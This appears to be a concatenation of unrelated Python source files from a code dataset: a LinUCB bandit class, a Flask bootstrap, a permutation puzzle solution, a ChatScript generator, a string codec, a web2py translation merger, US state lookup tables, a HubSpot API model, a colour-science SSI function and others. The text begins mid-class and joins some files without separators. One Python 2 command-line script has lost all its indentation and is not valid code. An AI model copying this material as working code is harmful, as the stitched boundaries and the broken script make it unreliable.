            'delta': self.delta,
            'bound_theta': self.bound_theta,
            'confidence_scaling_factor': self.confidence_scaling_factor,
            'A_inv': self.A_inv,
            'theta': self.theta,
            'b': self.b,
            'iteration': self.iteration,
        }
        with open(self.save_path + f'/linucb_model_{postfix}.pt', 'wb') as f:
            pickle.dump(state_dict, f)
        if os.path.exists(self.save_path + f'/linucb_model_{postfix}.pt'):
            print("Model Saved Succesfully!")
        return
    def load(self, path):
        """Unpickle and return a state dict written by :meth:`save`."""
        with open(path, 'rb') as f:
            state_dict = pickle.load(f)
        return state_dict
    @property
    def approximator_dim(self):
        """Number of parameters used in the approximator.
        For a linear model this is just the feature dimension.
        """
        return self.bandit.n_features
    def update_output_gradient(self):
        """For linear approximators, simply returns the features.
        Gradient for each arm here is the same. = Input
        """
        # Index by iteration modulo horizon T so the bandit's feature
        # buffer is reused cyclically.
        self.grad_approx = self.bandit.features[self.iteration % self.bandit.T]
    def evaluate_output_gradient(self, features):
        """For linear approximators, simply returns the features.
        """
        self.grad_approx = features[0]
    def reset(self):
        """Return the internal estimates.
        Initialize SINGLE PREDICTOR AND SINGLE B.
        REMEMBER TO USE ONLY THE FIRST A_INV
        """
        self.reset_upper_confidence_bounds()
        self.reset_actions()
        self.reset_grad_approx()
        # When restoring from a checkpoint (mock_reset=True), keep the
        # loaded A_inv/theta/b instead of re-randomising them.
        if not self.mock_reset:
            self.reset_A_inv()
            # Random theta within the [-bound_theta, bound_theta] box.
            self.theta = np.random.uniform(-1, 1, self.bandit.n_features) * self.bound_theta
            self.b = np.zeros(self.bandit.n_features)
    @property
    def confidence_multiplier(self):
        """Confidence interval multiplier.
        Delegates to the jit-compiled helper above.
        """
        return calc_confidence_multiplier(self.confidence_scaling_factor, self.approximator_dim, self.iteration,
                                          self.bound_features, self.reg_factor, self.delta)
    def predict(self):
        """Predict reward.
        Estimated reward per arm is the dot product of the current
        round's features with the linear predictor theta.
        """
        self.mu_hat = np.array(
            [
                np.dot(self.bandit.features[self.iteration % self.bandit.T, a], self.theta.T) for a in self.bandit.arms
            ]
        )
    def train(self):
        """Update linear predictor theta.
        Accumulates the reward-weighted feature vector into b and solves
        theta = A_inv @ b (A_inv is maintained by the superclass).
        """
        self.b += self.bandit.features[self.iteration % self.bandit.T, self.action] * self.bandit.rewards[
            self.iteration % self.bandit.T, self.action]
        self.theta = np.matmul(self.A_inv, self.b)
    def evaluate(self, features):
        # Same as predict(), but on externally supplied features
        # (first row of the given batch) rather than the bandit buffer.
        self.mu_hat = np.array(
            [
                np.dot(features[0, a], self.theta.T) for a in self.bandit.arms
            ]
        )
|
# Flask application bootstrap for the API service.
from flask import Flask
from flask_restful import Resource, Api

# Module-level app/api singletons that resource modules register against.
app = Flask(__name__)
api = Api(app)

# Imported for its side effect: registers all Resource routes on `api`.
# Kept at the bottom to avoid a circular import (resources import `api`).
import airbnbapi.resources
|
from .descriptors import (
number_of_rotatable_bonds,
number_of_rotatable_bonds_target_clipped,
)
|
import math
class Solution(object):
    def getPermutation(self, n, k):
        """Return the k-th (1-indexed) permutation of the digits 1..n.

        Factorial number system: with (i-1)! permutations per choice of
        leading digit, each digit is selected by integer division of the
        zero-based rank, then removed from the candidate pool.
        O(n^2) overall due to the list pop; n is at most 9.
        """
        # Precompute 0!..(n-1)!.
        factorials = [1] * n
        for i in range(1, n):
            factorials[i] = factorials[i - 1] * i
        digits = [str(d) for d in range(1, 10)]  # candidate digits, ascending
        remaining = k - 1                        # zero-based rank
        chosen = []
        for i in range(n, 0, -1):
            # Which block of (i-1)! permutations does the rank fall in?
            pos, remaining = divmod(remaining, factorials[i - 1])
            chosen.append(digits.pop(pos))
        return ''.join(chosen)
# Quick manual check: the 3rd permutation of [1, 2, 3] is "213".
n = 3
k = 3
res = Solution().getPermutation(n, k)
print(res)
# -*- coding: utf-8 -*-
import os
import glob
import models
import preprocessing
import wordembedding
import postprocessing
import generalize_rules
def load_file(path):
    """Load a text file and return its content as a list of lines.

    Args:
        path: Path to file.

    Returns:
        list: File content split on newline characters.
    """
    with open(path, 'r') as handle:
        return handle.read().split('\n')
def load_questions(path, lower=True):
    """Load a CSV-like questions file.

    The first line is the topic title; every following line is
    ``title,question,answer...`` (commas inside the answer are kept).

    Args:
        path: Path to questions file.
        lower: When True, questions are lower-cased.

    Returns:
        tuple: (header line, list of (title, question, answer) tuples).
    """
    lines = load_file(path)
    qnas = []
    for row in lines[1:]:
        parts = row.split(',')
        # Everything after the second comma belongs to the answer.
        answer_text = ','.join(parts[2:])
        question_text = parts[1].lower() if lower else parts[1]
        qnas.append((parts[0], question_text, answer_text))
    return lines[0], qnas
def preprocess_questions(qnas, ctx_entities):
    """Preprocess every question, keeping its answer untouched.

    Args:
        qnas (iterable): (question, answer) pairs.
        ctx_entities (list): Context entities passed to the preprocessor.

    Yields:
        tuple: (preprocessed question, original answer).
    """
    for raw_question, raw_answer in qnas:
        yield preprocessing.preprocess(raw_question, ctx_entities), raw_answer
def generate_rules(qnas, ctx_entities, embedding_model):
    """Generate the rules according to ChatScript syntax.

    Args:
        qnas (list): List of tuples with title, question and answer.
        ctx_entities (list): Context entities.
        embedding_model: Word-embedding model handed to each Rule.

    Returns:
        list: ``models.Rule`` objects, one per (title, question, answer).
    """
    rules = list()
    for rule_id, (title, question, answer) in enumerate(qnas):
        # The enumeration index doubles as the rule's unique id/label.
        rule = models.Rule(
            rule_id,
            title,
            question,
            answer,
            ctx_entities,
            embedding_model
        )
        rules.append(rule)
    return rules
def generate_topic_menu(topics):
    """Build a ChatScript "menu" topic listing every named topic.

    For each topic that has a ``beauty_name``, a rejoinder is generated
    that lists its rules' titles and reuses the matching rule on reply.

    Args:
        topics: Iterable of ``models.Topic`` objects.

    Returns:
        TopicMenu: Object whose ``str()`` is the ChatScript topic text.
    """
    names = list()
    rejoinders = list()
    for topic in topics:
        # Topics without a display name (e.g. generated ones) are skipped.
        if topic.beauty_name:
            names.append(topic.beauty_name)
            options = list()
            options_rule = list()
            for rule in topic.rules:
                if rule.title:
                    options.append(rule.title)
                    # Reuse the original rule's output when its title matches.
                    output = '^reuse(~{}.{})'.format(topic.name, rule.label)
                    options_rule.append(
                        '\n\t\t\t\tb: ({pattern}) {output}'.format(
                            pattern=rule.title, output=output
                        )
                    )
            # Join options
            options = '\n\t\t\t- '.join(options)
            options_text = ('\n\t\t\tSaber sobre:\n\t\t\t- {}').format(options)
            options_rule = ''.join(options_rule)
            rej = 'a: ({pattern}){options_text}{options_rule}'.format(
                pattern=topic.beauty_name.lower(),
                options_text=options_text,
                options_rule=options_rule,
            )
            rejoinders.append(rej)
    topics_names = '- {}'.format('\n\t- '.join(names))
    class TopicMenu(object):
        """Container for the menu topic; ``__str__`` renders ChatScript."""
        name = None
        head = None
        rejoinders = None
        def __init__(self, head, rejoinders):
            self.name = 'menu'
            self.head = head
            self.rejoinders = rejoinders
        def __str__(self):
            # NOTE(review): the Portuguese output strings contain apparent
            # typos ("informaçõe", "tranfeer") -- left untouched because
            # ChatScript concept names like ~tranfeer may be defined
            # elsewhere with the same spelling; confirm before fixing.
            topic_text = (
                'topic: ~menu keep repeat ()\n'
                'u: () Posso lhe dar informaçõe sobre:'
                '\n\t{head}\n\t- Falar com um atendente -'
                '\n\t\t{rejoinders}\n\t\ta: (<<falar atendente>>)'
                '\n\t\t\t^pick(~all_right), ^pick(~tranfeer).'
            ).format(
                head=self.head, rejoinders=self.rejoinders
            )
            return topic_text
    menu = TopicMenu(topics_names, '\n\t\t'.join(rejoinders))
    return menu
def generate(
    ctx_entities_path='input/ctx_entities.txt'
):
    """Generate ChatScript files.

    Reads every ``input/*.csv`` questions file next to this module,
    builds a normal topic plus a generalized topic per file, appends a
    menu topic, and writes the chatbot files via ``postprocessing``.

    Args:
        ctx_entities_path: Path to the context-entities list file.
    """
    input_files = list()
    # Resolve input/ relative to this module, not the working directory.
    dirname = os.path.dirname(os.path.abspath(__file__))
    dirname = os.path.join(dirname, 'input')
    input_files = glob.glob('{}*.csv'.format(dirname+os.sep))
    generetad_topics = list()
    cbow = wordembedding.CBoW()
    ctx_entities = load_file(ctx_entities_path)
    for questions_path in input_files:
        beaty_topic_name, questions = load_questions(questions_path)
        rules = generate_rules(questions, ctx_entities, cbow)
        sorted_rules = generalize_rules.sort_by_entities(rules, cbow)
        # Topic name comes from the CSV file name (without extension).
        top_name = questions_path.split(os.sep)[-1].split('.')[0]
        topic = models.Topic(top_name, rules, beauty_name=beaty_topic_name)
        # NOTE(review): passes the *module* `wordembedding`, not the `cbow`
        # instance used everywhere else -- looks suspicious; confirm what
        # generalize_rules.generalize expects.
        gen_rules = generalize_rules.generalize(topic, wordembedding)
        gen_topic = models.Topic(top_name+'_gen', gen_rules)
        topic.rules.extend(sorted_rules)
        generetad_topics.append(topic)
        generetad_topics.append(gen_topic)
    menu = generate_topic_menu(generetad_topics)
    generetad_topics.append(menu)
    postprocessing.save_chatbot_files('Botin', generetad_topics)
if __name__ == '__main__':
    generate()
|
class Codec:
    def encode(self, strs):
        """Encodes a list of strings to a single string.

        Each '|' inside a string is escaped as '||', and every string is
        terminated with the sentinel '|+'.

        :type strs: List[str]
        :rtype: str
        """
        pieces = []
        for item in strs:
            pieces.append(item.replace('|', '||'))
            pieces.append('|+')
        return ''.join(pieces)

    def decode(self, s):
        """Decodes a single string to a list of strings.

        Reads two characters at a time after a '|': '|+' ends the current
        string, '||' yields a literal '|'.

        :type s: str
        :rtype: List[str]
        """
        decoded = []
        current = []
        pos = 0
        length = len(s)
        while pos < length:
            ch = s[pos]
            if ch == '|':
                follower = s[pos + 1]
                if follower == '+':
                    # End-of-string sentinel.
                    decoded.append(''.join(current))
                    current = []
                else:
                    # Escaped character (always '|').
                    current.append(follower)
                pos += 2
            else:
                current.append(ch)
                pos += 1
        return decoded
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.decode(codec.encode(strs)) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Merge web2py translation dictionaries across applications.
#
# Usage: script <lang> <app1> <app2> ... <appN>
# For each app, (re)extract its <lang>.py language file with findT and
# merge all dictionaries (later apps win); write the merged, key-sorted
# dictionary into the LAST app, then copy it back to all earlier apps.
import sys
import shutil
import os
from gluon.languages import findT
sys.path.insert(0, '.')
file = sys.argv[1]   # language code, e.g. 'pt-br'
apps = sys.argv[2:]  # application folder names
d = {}
for app in apps:
    path = 'applications/%s/' % app
    findT(path, file)
    # Language files are plain Python dict literals, so eval() works;
    # use a context manager so the handle is closed deterministically.
    with open(os.path.join(path, 'languages', '%s.py' % file)) as fin:
        data = eval(fin.read())
    d.update(data)
path = 'applications/%s/' % apps[-1]
file1 = os.path.join(path, 'languages', '%s.py' % file)
with open(file1, 'w') as f:
    f.write('{\n')
    # BUG FIX: `keys = d.keys(); keys.sort()` is Python-2-only --
    # dict.keys() returns a view without .sort() on Python 3.
    for key in sorted(d.keys()):
        f.write('%s:%s,\n' % (repr(key), repr(str(d[key]))))
    f.write('}\n')
# Propagate the merged file to every other app (order is irrelevant
# since the same file is copied everywhere).
for app in reversed(apps[:-1]):
    path2 = 'applications/%s/' % app
    file2 = os.path.join(path2, 'languages', '%s.py' % file)
    shutil.copyfile(file1, file2)
|
# Lowercase two-letter USPS abbreviations for the 50 U.S. states
# (no DC or territories), ordered alphabetically by state name.
StateAbbreviations = [
    'al',
    'ak',
    'az',
    'ar',
    'ca',
    'co',
    'ct',
    'de',
    'fl',
    'ga',
    'hi',
    'id',
    'il',
    'in',
    'ia',
    'ks',
    'ky',
    'la',
    'me',
    'md',
    'ma',
    'mi',
    'mn',
    'ms',
    'mo',
    'mt',
    'ne',
    'nv',
    'nh',
    'nj',
    'nm',
    'ny',
    'nc',
    'nd',
    'oh',
    'ok',
    'or',
    'pa',
    'ri',
    'sc',
    'sd',
    'tn',
    'tx',
    'ut',
    'vt',
    'va',
    'wa',
    'wv',
    'wi',
    'wy']
# UPPERCASE state name -> uppercase USPS abbreviation for the 50 states.
# Keys are upper-cased; callers should .upper() their input before lookup.
StateNameToAbbreviation = {
    'ALABAMA': 'AL',
    'ALASKA': 'AK',
    'ARIZONA': 'AZ',
    'ARKANSAS': 'AR',
    'CALIFORNIA': 'CA',
    'COLORADO': 'CO',
    'CONNECTICUT': 'CT',
    'DELAWARE': 'DE',
    'FLORIDA': 'FL',
    'GEORGIA': 'GA',
    'HAWAII': 'HI',
    'IDAHO': 'ID',
    'ILLINOIS': 'IL',
    'INDIANA': 'IN',
    'IOWA': 'IA',
    'KANSAS': 'KS',
    'KENTUCKY': 'KY',
    'LOUISIANA': 'LA',
    'MAINE': 'ME',
    'MARYLAND': 'MD',
    'MASSACHUSETTS': 'MA',
    'MICHIGAN': 'MI',
    'MINNESOTA': 'MN',
    'MISSISSIPPI': 'MS',
    'MISSOURI': 'MO',
    'MONTANA': 'MT',
    'NEBRASKA': 'NE',
    'NEVADA': 'NV',
    'NEW HAMPSHIRE': 'NH',
    'NEW JERSEY': 'NJ',
    'NEW MEXICO': 'NM',
    'NEW YORK': 'NY',
    'NORTH CAROLINA': 'NC',
    'NORTH DAKOTA': 'ND',
    'OHIO': 'OH',
    'OKLAHOMA': 'OK',
    'OREGON': 'OR',
    'PENNSYLVANIA': 'PA',
    'RHODE ISLAND': 'RI',
    'SOUTH CAROLINA': 'SC',
    'SOUTH DAKOTA': 'SD',
    'TENNESSEE': 'TN',
    'TEXAS': 'TX',
    'UTAH': 'UT',
    'VERMONT': 'VT',
    'VIRGINIA': 'VA',
    'WASHINGTON': 'WA',
    'WEST VIRGINIA': 'WV',
    'WISCONSIN': 'WI',
    'WYOMING': 'WY',
}
# Uppercase USPS abbreviation -> title-cased state display name
# (inverse of StateNameToAbbreviation, with display capitalisation).
StateAbbreviationToName = {
    'AL': 'Alabama',
    'AK': 'Alaska',
    'AZ': 'Arizona',
    'AR': 'Arkansas',
    'CA': 'California',
    'CO': 'Colorado',
    'CT': 'Connecticut',
    'DE': 'Delaware',
    'FL': 'Florida',
    'GA': 'Georgia',
    'HI': 'Hawaii',
    'ID': 'Idaho',
    'IL': 'Illinois',
    'IN': 'Indiana',
    'IA': 'Iowa',
    'KS': 'Kansas',
    'KY': 'Kentucky',
    'LA': 'Louisiana',
    'ME': 'Maine',
    'MD': 'Maryland',
    'MA': 'Massachusetts',
    'MI': 'Michigan',
    'MN': 'Minnesota',
    'MS': 'Mississippi',
    'MO': 'Missouri',
    'MT': 'Montana',
    'NE': 'Nebraska',
    'NV': 'Nevada',
    'NH': 'New Hampshire',
    'NJ': 'New Jersey',
    'NM': 'New Mexico',
    'NY': 'New York',
    'NC': 'North Carolina',
    'ND': 'North Dakota',
    'OH': 'Ohio',
    'OK': 'Oklahoma',
    'OR': 'Oregon',
    'PA': 'Pennsylvania',
    'RI': 'Rhode Island',
    'SC': 'South Carolina',
    'SD': 'South Dakota',
    'TN': 'Tennessee',
    'TX': 'Texas',
    'UT': 'Utah',
    'VT': 'Vermont',
    'VA': 'Virginia',
    'WA': 'Washington',
    'WV': 'West Virginia',
    'WI': 'Wisconsin',
    'WY': 'Wyoming',
}
|
# coding: utf-8
"""
Accounting Extension
These APIs allow you to interact with HubSpot's Accounting Extension. It allows you to: * Specify the URLs that HubSpot will use when making webhook requests to your external accounting system. * Respond to webhook calls made to your external accounting system by HubSpot # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from hubspot.crm.extensions.accounting.configuration import Configuration
class InvoiceCreatePaymentRequest(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    (Regenerate from the OpenAPI spec instead of patching by hand.)
    """
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Python attribute name -> declared OpenAPI type.
    openapi_types = {
        "amount_paid": "float",
        "currency_code": "str",
        "payment_date_time": "datetime",
        "external_payment_id": "str",
    }
    # Python attribute name -> JSON (camelCase) key on the wire.
    attribute_map = {
        "amount_paid": "amountPaid",
        "currency_code": "currencyCode",
        "payment_date_time": "paymentDateTime",
        "external_payment_id": "externalPaymentId",
    }
    def __init__(
        self,
        amount_paid=None,
        currency_code=None,
        payment_date_time=None,
        external_payment_id=None,
        local_vars_configuration=None,
    ):  # noqa: E501
        """InvoiceCreatePaymentRequest - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration
        self._amount_paid = None
        self._currency_code = None
        self._payment_date_time = None
        self._external_payment_id = None
        self.discriminator = None
        # Assign through the property setters so client-side validation
        # (None checks) runs on construction.
        self.amount_paid = amount_paid
        self.currency_code = currency_code
        self.payment_date_time = payment_date_time
        self.external_payment_id = external_payment_id
    @property
    def amount_paid(self):
        """Gets the amount_paid of this InvoiceCreatePaymentRequest.  # noqa: E501

        The amount that this payment is for.  # noqa: E501

        :return: The amount_paid of this InvoiceCreatePaymentRequest.  # noqa: E501
        :rtype: float
        """
        return self._amount_paid
    @amount_paid.setter
    def amount_paid(self, amount_paid):
        """Sets the amount_paid of this InvoiceCreatePaymentRequest.

        The amount that this payment is for.  # noqa: E501

        :param amount_paid: The amount_paid of this InvoiceCreatePaymentRequest.  # noqa: E501
        :type: float
        """
        if (
            self.local_vars_configuration.client_side_validation and amount_paid is None
        ):  # noqa: E501
            raise ValueError(
                "Invalid value for `amount_paid`, must not be `None`"
            )  # noqa: E501
        self._amount_paid = amount_paid
    @property
    def currency_code(self):
        """Gets the currency_code of this InvoiceCreatePaymentRequest.  # noqa: E501

        The ISO 4217 currency code that represents the currency of the payment.  # noqa: E501

        :return: The currency_code of this InvoiceCreatePaymentRequest.  # noqa: E501
        :rtype: str
        """
        return self._currency_code
    @currency_code.setter
    def currency_code(self, currency_code):
        """Sets the currency_code of this InvoiceCreatePaymentRequest.

        The ISO 4217 currency code that represents the currency of the payment.  # noqa: E501

        :param currency_code: The currency_code of this InvoiceCreatePaymentRequest.  # noqa: E501
        :type: str
        """
        if (
            self.local_vars_configuration.client_side_validation
            and currency_code is None
        ):  # noqa: E501
            raise ValueError(
                "Invalid value for `currency_code`, must not be `None`"
            )  # noqa: E501
        self._currency_code = currency_code
    @property
    def payment_date_time(self):
        """Gets the payment_date_time of this InvoiceCreatePaymentRequest.  # noqa: E501

        The datetime that this payment was received.  # noqa: E501

        :return: The payment_date_time of this InvoiceCreatePaymentRequest.  # noqa: E501
        :rtype: datetime
        """
        return self._payment_date_time
    @payment_date_time.setter
    def payment_date_time(self, payment_date_time):
        """Sets the payment_date_time of this InvoiceCreatePaymentRequest.

        The datetime that this payment was received.  # noqa: E501

        :param payment_date_time: The payment_date_time of this InvoiceCreatePaymentRequest.  # noqa: E501
        :type: datetime
        """
        if (
            self.local_vars_configuration.client_side_validation
            and payment_date_time is None
        ):  # noqa: E501
            raise ValueError(
                "Invalid value for `payment_date_time`, must not be `None`"
            )  # noqa: E501
        self._payment_date_time = payment_date_time
    @property
    def external_payment_id(self):
        """Gets the external_payment_id of this InvoiceCreatePaymentRequest.  # noqa: E501

        The id of this payment in the external accounting system.  # noqa: E501

        :return: The external_payment_id of this InvoiceCreatePaymentRequest.  # noqa: E501
        :rtype: str
        """
        return self._external_payment_id
    @external_payment_id.setter
    def external_payment_id(self, external_payment_id):
        """Sets the external_payment_id of this InvoiceCreatePaymentRequest.

        The id of this payment in the external accounting system.  # noqa: E501

        :param external_payment_id: The external_payment_id of this InvoiceCreatePaymentRequest.  # noqa: E501
        :type: str
        """
        if (
            self.local_vars_configuration.client_side_validation
            and external_payment_id is None
        ):  # noqa: E501
            raise ValueError(
                "Invalid value for `external_payment_id`, must not be `None`"
            )  # noqa: E501
        self._external_payment_id = external_payment_id
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively serialise nested models, lists and dicts of models.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(
                    map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
                )
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(
                    map(
                        lambda item: (item[0], item[1].to_dict())
                        if hasattr(item[1], "to_dict")
                        else item,
                        value.items(),
                    )
                )
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, InvoiceCreatePaymentRequest):
            return False
        return self.to_dict() == other.to_dict()
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, InvoiceCreatePaymentRequest):
            return True
        return self.to_dict() != other.to_dict()
class Tone:
    """A pure tone characterised by its frequency."""

    def __init__(self, frequency):
        # Store the magnitude only: a tone's frequency is kept as a
        # non-negative number of Hertz (Hz).
        self._hz = abs(frequency)

    @property
    def frequency(self):
        """The tone's frequency in Hertz (read-only, never negative)."""
        return self._hz
# coding: utf-8
from __future__ import absolute_import
from pyblaze.base import BlazeError
from pyblaze.qed import sparse2qed_fp32, sparse2qed_fp16
import numpy as np
import logging
import sys, getopt
def print_help():
    # Print command-line usage for the build_qed tool.
    # NOTE: this module uses Python 2 print statements throughout.
    print 'build_qed -p <path> -i <infile> -o <ofile> -s <precision> -t <threadnum>'
    print ''
    print ' precision option: 0 -> fp32 1 -> fp16'
if __name__ == '__main__':
try:
opts, args = getopt.getopt(sys.argv[1:],"hi:o:t:s:p:",
["ifile=", "ofile=", "threadnum=", "precision=", "path="])
except getopt.GetoptError:
print_help()
sys.exit(2)
path = ''
i_file = ''
o_file = ''
precision = 1 # fp16
thread_num = 1
for opt, arg in opts:
if opt == '-h':
print_help()
sys.exit()
elif opt in ("-p", "--path"):
path = arg
elif opt in ("-i", "--ifile"):
i_file = arg
elif opt in ("-o", "--ofile"):
o_file = arg
elif opt in ("-s", "--precision"):
precision = int(arg)
elif opt in ("-t", "--threadnum"):
thread_num = int(arg)
if precision == 1:
sparse2qed_fp16(path, i_file, o_file, thread_num)
elif precision == 0:
sparse2qed_fp32(path, i_file, o_file, thread_num)
else:
print 'unkown presicion:', precision
sys.exit(1)
|
# -*- coding: utf-8 -*-
"""
Academy Spectral Similarity Index (SSI)
=======================================
Defines the *Academy Spectral Similarity Index* (SSI) computation objects:
- :func:`colour.spectral_similarity_index`
References
----------
- :cite:`TheAcademyofMotionPictureArtsandSciences2019` : The Academy of
Motion Picture Arts and Sciences. (2019). Academy Spectral Similarity Index
(SSI): Overview (pp. 1-7).
"""
from __future__ import division, unicode_literals
import numpy as np
from scipy.ndimage.filters import convolve1d
from colour.algebra import LinearInterpolator
from colour.colorimetry import SpectralShape
from colour.utilities import zeros
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2020 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = 'colour-developers@colour-science.org'
__status__ = 'Production'
__all__ = ['SSI_SPECTRAL_SHAPE', 'spectral_similarity_index']
SSI_SPECTRAL_SHAPE = SpectralShape(375, 675, 1)
"""
*Academy Spectral Similarity Index* (SSI) spectral shape.
SSI_SPECTRAL_SHAPE : SpectralShape
"""
_SSI_LARGE_SPECTRAL_SHAPE = SpectralShape(380, 670, 10)
_INTEGRATION_MATRIX = None
def spectral_similarity_index(sd_test, sd_reference):
    """
    Returns the *Academy Spectral Similarity Index* (SSI) of given test
    spectral distribution with given reference spectral distribution.

    Parameters
    ----------
    sd_test : SpectralDistribution
        Test spectral distribution.
    sd_reference : SpectralDistribution
        Reference spectral distribution.

    Returns
    -------
    numeric
        *Academy Spectral Similarity Index* (SSI).

    References
    ----------
    :cite:`TheAcademyofMotionPictureArtsandSciences2019`

    Examples
    --------
    >>> from colour import ILLUMINANT_SDS
    >>> sd_test = ILLUMINANT_SDS['C']
    >>> sd_reference = ILLUMINANT_SDS['D65']
    >>> spectral_similarity_index(sd_test, sd_reference)
    94.0
    """
    global _INTEGRATION_MATRIX
    if _INTEGRATION_MATRIX is None:
        # Lazily build and cache the matrix that re-bins the 1nm-sampled
        # distributions into 10nm-wide bands with half-weighted edges.
        _INTEGRATION_MATRIX = zeros([
            len(_SSI_LARGE_SPECTRAL_SHAPE.range()),
            len(SSI_SPECTRAL_SHAPE.range())
        ])
        weights = np.array([0.5, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.5])
        for i in range(_INTEGRATION_MATRIX.shape[0]):
            _INTEGRATION_MATRIX[i, (10 * i):(10 * i + 11)] = weights
    # Align both distributions to the SSI shape (375-675nm @ 1nm),
    # linearly interpolating and zero-extrapolating outside the data.
    settings = {
        'interpolator': LinearInterpolator,
        'extrapolator_kwargs': {
            'left': 0,
            'right': 0
        }
    }
    sd_test = sd_test.copy().align(SSI_SPECTRAL_SHAPE, **settings)
    sd_reference = sd_reference.copy().align(SSI_SPECTRAL_SHAPE, **settings)
    # Re-bin, then normalise each distribution to unit sum.
    test_i = np.dot(_INTEGRATION_MATRIX, sd_test.values)
    reference_i = np.dot(_INTEGRATION_MATRIX, sd_reference.values)
    test_i /= np.sum(test_i)
    reference_i /= np.sum(reference_i)
    d_i = test_i - reference_i
    # Relative difference, regularised by adding the reference mean to
    # avoid blow-up where the reference is near zero.
    dr_i = d_i / (reference_i + np.mean(reference_i))
    # Band weights per the SSI specification (extremes are de-emphasised).
    wdr_i = dr_i * [
        12 / 45, 22 / 45, 32 / 45, 40 / 45, 44 / 45, 1, 1, 1, 1, 1, 1, 1, 1, 1,
        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 11 / 15, 3 / 15
    ]
    # Smooth with a [0.22, 0.56, 0.22] kernel over a zero-padded vector.
    c_wdr_i = convolve1d(np.hstack([0, wdr_i, 0]), [0.22, 0.56, 0.22])
    m_v = np.sum(c_wdr_i ** 2)
    # Map the metric onto the 0-100 SSI scale and round to an integer.
    SSI = np.around(100 - 32 * np.sqrt(m_v))
    return SSI
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.